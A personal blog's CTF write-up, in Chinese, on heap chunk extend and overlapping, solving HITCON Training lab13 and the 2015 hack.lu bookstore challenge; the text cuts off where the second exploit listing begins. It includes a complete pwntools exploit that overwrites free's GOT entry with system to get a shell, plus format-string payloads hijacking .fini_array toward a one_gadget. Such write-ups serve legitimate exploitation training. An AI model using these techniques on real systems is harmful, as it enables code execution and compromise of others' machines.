<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="baidu-site-verification" content="codeva-ROfYcqLkCh" />
    <meta name="msvalidate.01" content="ECA3E06A0E52A2AC90C4B06F12981FB2" />
    <meta name="description" content="HITCON Trainging lab13https:&#x2F;&#x2F;github.com&#x2F;ctf-wiki&#x2F;ctf-challenges&#x2F;tree&#x2F;master&#x2F;pwn&#x2F;heap&#x2F;chunk-extend-shrink&#x2F;hitcontraning_lab13 1234567grxer@grxer ~&#x2F;D&#x2F;c&#x2F;p&#x2F;heap&gt; checksec heapcreator[*] &amp;#x27;&#x2F;home&#x2F;gr">
<meta property="og:type" content="article">
<meta property="og:title" content="Chunk Extend and Overlapping">
<meta property="og:url" content="https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/index.html">
<meta property="og:site_name" content="Computer Security">
<meta property="og:description" content="HITCON Trainging lab13https:&#x2F;&#x2F;github.com&#x2F;ctf-wiki&#x2F;ctf-challenges&#x2F;tree&#x2F;master&#x2F;pwn&#x2F;heap&#x2F;chunk-extend-shrink&#x2F;hitcontraning_lab13 1234567grxer@grxer ~&#x2F;D&#x2F;c&#x2F;p&#x2F;heap&gt; checksec heapcreator[*] &amp;#x27;&#x2F;home&#x2F;gr">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311010202508.png">
<meta property="og:image" content="https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311010444200.png">
<meta property="og:image" content="https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311011034574.png">
<meta property="og:image" content="https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311012105213.png">
<meta property="og:image" content="https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311014939768.png">
<meta property="og:image" content="https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311172008247.png">
<meta property="og:image" content="https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311172557368.png">
<meta property="og:image" content="https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311172648818.png">
<meta property="og:image" content="https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311175311347.png">
<meta property="og:image" content="https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311175610680.png">
<meta property="og:image" content="https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311180117794.png">
<meta property="og:image" content="https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311181810289.png">
<meta property="og:image" content="https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311181846332.png">
<meta property="article:published_time" content="2023-03-10T15:21:24.000Z">
<meta property="article:modified_time" content="2023-03-11T13:58:16.187Z">
<meta property="article:author" content="Grxer">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311010202508.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Chunk Extend and Overlapping</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2023/03/12/ciscn-2019-es-2/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2023/03/05/sd-police2023-pwn/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&text=Chunk Extend and Overlapping"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&title=Chunk Extend and Overlapping"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&is_video=false&description=Chunk Extend and Overlapping"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Chunk Extend and Overlapping&body=Check out this article: https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&title=Chunk Extend and Overlapping"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&title=Chunk Extend and Overlapping"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&title=Chunk Extend and Overlapping"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&title=Chunk Extend and Overlapping"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&name=Chunk Extend and Overlapping&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&t=Chunk Extend and Overlapping"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#HITCON-Trainging-lab13"><span class="toc-number">1.</span> <span class="toc-text">HITCON Trainging lab13</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exp"><span class="toc-number">2.</span> <span class="toc-text">exp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2015-hacklu-bookstore"><span class="toc-number">3.</span> <span class="toc-text">2015 hacklu bookstore</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%A7%E4%BD%93%E6%80%9D%E8%B7%AF"><span class="toc-number">3.1.</span> <span class="toc-text">大体思路</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B7%E4%BD%93%E7%BB%86%E8%8A%82"><span class="toc-number">3.2.</span> <span class="toc-text">具体细节</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EXP"><span class="toc-number">4.</span> <span class="toc-text">EXP</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Chunk Extend and Overlapping
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Grxer</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-03-10T15:21:24.000Z" itemprop="datePublished">2023-03-10</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="HITCON-Trainging-lab13"><a href="#HITCON-Trainging-lab13" class="headerlink" title="HITCON Trainging lab13"></a>HITCON Trainging lab13</h2><p><a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/chunk-extend-shrink/hitcontraning_lab13">https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/chunk-extend-shrink/hitcontraning_lab13</a></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">grxer@grxer ~/D/c/p/heap&gt; checksec heapcreator</span><br><span class="line">[*] &#x27;/home/grxer/Desktop/ctfwiki/pwn/heap/heapcreator&#x27;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x400000)</span><br></pre></td></tr></table></figure>

<p>heaparray是一个在bss段的全局heap结构体数组</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">heap</span> &#123;</span></span><br><span class="line">	<span class="type">size_t</span> size ;</span><br><span class="line">	<span class="type">char</span> *content ;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>free后没有将content指针置零</p>
<p>在edit时还存在off by one漏洞</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( heaparray[v1] )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Content of heap : &quot;</span>);</span><br><span class="line">    read_input(heaparray[v1]-&gt;content, heaparray[v1]-&gt;size + <span class="number">1</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Done !&quot;</span>);</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>我们可以利用空间复用的机制改掉下一个chunk的size</p>
<p>create(0x18, b”one”)<br>create(0x10, b”two”) </p>
<p>会创建出4个0x20的chunk，其中one的chunk会利用two的pre_size来存放数据</p>
<p><img src="/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311010202508.png" alt="image-20230311010202508"></p>
<p>这样我们编辑one的context就可以控制two的size</p>
<p>edit(0, “&#x2F;bin&#x2F;sh\x00” + “a” * 0x10 + “\x41”)</p>
<p>改为41</p>
<p><img src="/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311010444200.png" alt="image-20230311010444200"></p>
<p>再释放two  delete(1) 可以看到已经有了overlap的chunk</p>
<p><img src="/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311011034574.png" alt="image-20230311011034574"></p>
<p>再申请一个堆块create(0x30, p64(0) * 4 + p64(0x30) + p64(elf.got[‘free’]))</p>
<p>这样我们的 *heap会申请到0x20的chunk，content会申请到0x40的chunk，我们的0x40chunk会overlap到0x20的chunk，从而控制其内容，我们把他的content指针改为got就，可以在show的时候输出地址</p>
<p><img src="/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311012105213.png" alt="image-20230311012105213"></p>
<p>这样就可以得到system地址，这时候去edit two,就会修改free got里面内容，改为system，再去delete one，加上我们之前输入的binsh就可以拿到shell</p>
<p><img src="/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311014939768.png" alt="image-20230311014939768"></p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">pwnfile=<span class="string">&#x27;./heapcreator&#x27;</span></span><br><span class="line">elf = ELF(pwnfile)</span><br><span class="line">rop = ROP(pwnfile)</span><br><span class="line"><span class="keyword">if</span> args[<span class="string">&#x27;REMOTE&#x27;</span>]:</span><br><span class="line">    io = remote()</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    io = process(pwnfile)</span><br><span class="line">r = <span class="keyword">lambda</span> x: io.recv(x)</span><br><span class="line">ra = <span class="keyword">lambda</span>: io.recvall()</span><br><span class="line">rl = <span class="keyword">lambda</span>: io.recvline(keepends=<span class="literal">True</span>)</span><br><span class="line">ru = <span class="keyword">lambda</span> x: io.recvuntil(x, drop=<span class="literal">True</span>)</span><br><span class="line">s = <span class="keyword">lambda</span> x: io.send(x)</span><br><span class="line">sl = <span class="keyword">lambda</span> x: io.sendline(x)</span><br><span class="line">sa = <span class="keyword">lambda</span> x, y: io.sendafter(x, y)</span><br><span class="line">sla = <span class="keyword">lambda</span> x, y: io.sendlineafter(x, y)</span><br><span class="line">ia = <span class="keyword">lambda</span>: io.interactive()</span><br><span class="line">c = <span class="keyword">lambda</span>: io.close()</span><br><span class="line">li = <span class="keyword">lambda</span> x: log.info(x)</span><br><span class="line">db = <span class="keyword">lambda</span> x : gdb.attach(io,x)</span><br><span class="line">p =<span class="keyword">lambda</span> x,y:success(x+<span class="string">&#x27;--&gt;&#x27;</span>+<span class="built_in">hex</span>(y))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">create</span>(<span class="params">size, content</span>):</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    io.sendline(<span class="string">b&quot;1&quot;</span>)</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    io.sendline(<span class="built_in">str</span>(size).encode())</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    io.sendline(content)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">idx, content</span>):</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    io.sendline(<span class="string">b&quot;2&quot;</span>)</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    io.sendline(<span class="built_in">str</span>(idx).encode())</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    io.sendline(content)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">idx</span>):</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    io.sendline(<span class="string">b&quot;3&quot;</span>)</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    io.sendline(<span class="built_in">str</span>(idx).encode())</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">idx</span>):</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    io.sendline(<span class="string">b&quot;4&quot;</span>)</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;:&quot;</span>)</span><br><span class="line">    io.sendline(<span class="built_in">str</span>(idx).encode())</span><br><span class="line">    </span><br><span class="line">db(<span class="string">&#x27;b *0x00400A43&#x27;</span>)</span><br><span class="line">create(<span class="number">0x18</span>, <span class="string">b&quot;one&quot;</span>) </span><br><span class="line">create(<span class="number">0x10</span>, <span class="string">b&quot;two&quot;</span>) </span><br><span class="line">edit(<span class="number">0</span>, <span class="string">b&quot;/bin/sh\x00&quot;</span> + <span class="string">b&quot;a&quot;</span> * <span class="number">0x10</span> + <span class="string">b&quot;\x41&quot;</span>)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">create(<span class="number">0x30</span>, p64(<span class="number">0</span>) * <span class="number">4</span> + p64(<span class="number">0x30</span>) + p64(elf.got[<span class="string">&#x27;free&#x27;</span>]))  <span class="comment">#1</span></span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">ru(<span class="string">b&quot;Content : &quot;</span>)</span><br><span class="line">free_ad =u64(r(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">p(<span class="string">&#x27;free_addr&#x27;</span>,free_ad)</span><br><span class="line">libc=LibcSearcher(<span class="string">&#x27;free&#x27;</span>,free_ad)</span><br><span class="line">base=free_ad-libc.dump(<span class="string">&#x27;free&#x27;</span>)</span><br><span class="line">p(<span class="string">&#x27;base&#x27;</span>,base)</span><br><span class="line">system=base+libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">edit(<span class="number">1</span>,p64(system))</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="2015-hacklu-bookstore"><a href="#2015-hacklu-bookstore" class="headerlink" title="2015 hacklu bookstore"></a>2015 hacklu bookstore</h2><p><a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/chunk-extend-shrink/2015_hacklu_bookstore">https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/chunk-extend-shrink/2015_hacklu_bookstore</a></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">grxer@grxer ~/D/c/p/heap&gt; checksec books_e_o </span><br><span class="line">[*] &#x27;/home/grxer/Desktop/ctfwiki/pwn/heap/books_e_o&#x27;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    No RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x400000)</span><br></pre></td></tr></table></figure>

<h3 id="大体思路"><a href="#大体思路" class="headerlink" title="大体思路"></a>大体思路</h3><p>稍微看一下漏洞挺多的</p>
<ul>
<li>main函数里有格式化字符串漏洞</li>
<li>delete_order函数里有uaf漏洞</li>
<li>edit_order函数里有任意堆覆盖漏洞，可以进行overlap</li>
</ul>
<p>堆我们不能自己申请，只能main前面申请了0x80大小的三个堆，后面submit时一个0x140堆</p>
<p>print(dest)</p>
<p>dest是第三个堆，我们可以利用先利用覆盖漏洞将第二个堆的size覆盖为0x150这样再delete这个堆就会把dest一块释放到bins，后面再submit申请时，就会申请到这个堆，submit这个堆是可以利用堆1和堆2中的值控制的，从而计算好偏移，控制dest，进一步利用格式化字符串漏洞</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">unsigned</span> __int64 __fastcall <span class="title function_">submit</span><span class="params">(<span class="type">char</span> *all, <span class="type">const</span> <span class="type">char</span> *order1, <span class="type">char</span> *order2)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">size_t</span> v3; <span class="comment">// rax</span></span><br><span class="line">  <span class="type">size_t</span> v4; <span class="comment">// rax</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v7; <span class="comment">// [rsp+28h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v7 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">strcpy</span>(all, <span class="string">&quot;Order 1: &quot;</span>);</span><br><span class="line">  v3 = <span class="built_in">strlen</span>(order1);</span><br><span class="line">  <span class="built_in">strncat</span>(all, order1, v3);</span><br><span class="line">  <span class="built_in">strcat</span>(all, <span class="string">&quot;\nOrder 2: &quot;</span>);</span><br><span class="line">  v4 = <span class="built_in">strlen</span>(order2);</span><br><span class="line">  <span class="built_in">strncat</span>(all, order2, v4);</span><br><span class="line">  *(_WORD *)&amp;all[<span class="built_in">strlen</span>(all)] = <span class="string">&#x27;\n&#x27;</span>;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v7;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>利用格式化漏洞基本上都要先泄露地址，再布置改写地址，此题也不例外</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#125;</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;%s&quot;</span>, v5);</span><br><span class="line"><span class="built_in">printf</span>(dest);</span><br><span class="line"><span class="keyword">return</span> <span class="number">0LL</span>;</span><br></pre></td></tr></table></figure>

<p>但是在格式化字符串漏洞之后，就会ret，无法再次利用，这就需要我们利用 fini_array hook掉执行流</p>
<blockquote>
<p>fini_array hook</p>
<p><code>.init_array</code>和 <code>.fini_array</code>中存放了指向初始化代码和终止代码的函数指针。</p>
<p><code>.init_array</code>会在main()函数调用前执行，这样可以通过修该地址的指针来将控制流指向病毒或者寄生代码，因为比main执行还早，大部分恶意软件都是hook这个，感觉c++的构造函数或许和这个相关</p>
<p><code>.fini_array</code> 函数指针在 main() 函数执行完之后才被触发，感觉c++的析构函数或许和这个相关</p>
<p>array[1]-&gt;array[0]</p>
</blockquote>
<p><img src="/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311172008247.png" alt="image-20230311172008247"></p>
<p>这样我们就可以二次利用漏洞进行改写地址</p>
<h3 id="具体细节"><a href="#具体细节" class="headerlink" title="具体细节"></a>具体细节</h3><p>刚开始的堆</p>
<p><img src="/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311172557368.png" alt="image-20230311172557368"></p>
<p>payload &#x3D; b”%”+str(2617).encode()+b”c%13$hn” + b’abc%51$p’ + b’def%26$p’<br>payload +&#x3D; b’A’*(0x74-len(payload))<br>payload&#x3D;payload.ljust(0x88,b’\x00’)<br>payload +&#x3D; p64(0x151)</p>
<p>edit(1,payload)</p>
<p>覆盖size的堆</p>
<p><img src="/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311172648818.png" alt="image-20230311172648818"></p>
<p>这里payload的%51是返回地址__libc_start_main+128的</p>
<blockquote>
<p>为什么是0x74呢</p>
<p>这里submit函数可以看出他还进行拼接，正常的话需要0x90个字节到达dest内容，</p>
<p>‘Order 1:<code>+</code>chunk1<code>+</code>\n<code>+</code>Order 2:<code>+</code>Order 1: ’ 拼接导致他会多28个字节</p>
<p>0x90-28&#x3D;0x74</p>
</blockquote>
<p>我们再</p>
<p>delete(2)</p>
<p>payload2 &#x3D; p8(0x0)*7 + p64(fini_array)<br>submit(payload2)</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">fgets(s, <span class="number">128</span>, <span class="built_in">stdin</span>);</span><br><span class="line">  <span class="keyword">switch</span> ( s[<span class="number">0</span>] )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">case</span> <span class="string">&#x27;1&#x27;</span>:</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;Enter first </span></span><br></pre></td></tr></table></figure>

<p>这里我们利用fget，的s是在栈上的，gdb得到fini_array被写到了格式化字符串第13个参数</p>
<p><img src="/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311175311347.png" alt="image-20230311175311347"></p>
<p>0x400830和main地址 0x400A39只有一个字节的差距我们在第一个payload利用b”%”+str(2617).encode()+b”c%13$hn”改写为main，这样main ret是会再次返回到main</p>
<p>第一个pay的%26$p是</p>
<p><img src="/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311175610680.png" alt="image-20230311175610680"></p>
<p>他和后面的返回地址已经下次hook返回到main的地址的返回地址的栈地址偏移是固定的</p>
<img src="/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311180117794.png" alt="image-20230311180117794" style="zoom:67%;">

<p>计算出来<code>ret_bp=fixed-0x461-0x100</code></p>
<p>这样我们就可以改写这个main的返回地址为one_gadget地址</p>
<p>payload&#x3D;b’%’+str(one_gadget&amp;0xff).encode()+b’c%13$hhn%’+str(((one_gadget&gt;&gt;8)&amp;0xffff)-(one_gadget&amp;0xff)).encode()+b’c%14$hn’<br>print(payload)<br>payload +&#x3D; b’A’*(0x74-len(payload))<br>payload&#x3D;payload.ljust(0x88,b’\x00’)<br>payload +&#x3D; p64(0x151)<br>edit(1,payload)<br>delete(2)<br>payload&#x3D;p8(0x0)*7+p64(ret_bp)+p64(ret_bp+1)<br>submit(payload)</p>
<p><img src="/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311181810289.png" alt="image-20230311181810289"></p>
<p>拿到shell</p>
<p><img src="/2023/03/10/Chunk-Extend-and-Overlapping/image-20230311181846332.png" alt="image-20230311181846332"></p>
<h2 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span 